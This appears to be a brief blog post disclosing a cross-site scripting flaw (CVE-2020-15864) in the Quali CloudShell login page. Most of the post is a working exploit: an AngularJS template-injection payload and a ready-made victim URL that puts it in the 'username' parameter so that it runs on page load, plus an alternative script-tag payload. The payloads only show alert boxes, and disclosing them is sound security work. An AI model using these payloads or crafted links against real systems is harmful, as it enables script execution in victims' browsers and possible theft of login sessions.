Payload:
{{constructor.constructor(%27alert(19891337)%27)()}
Add "username" as a parameter to the login URL to reference the username field of the Quali CloudShell login page, and the JavaScript will execute when they visit the URL, i.e.
https://victim/Account/Login?ReturnUrl%252fAccount%252f%&username={{constructor.constructor(%27alert(1337)%27)()}}
Note: <sCript>alert(1337)<scRipt> works too, but isn't as dangerous because it won't autoload through the URL like the constructor payload does.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15864
No comments:
Post a Comment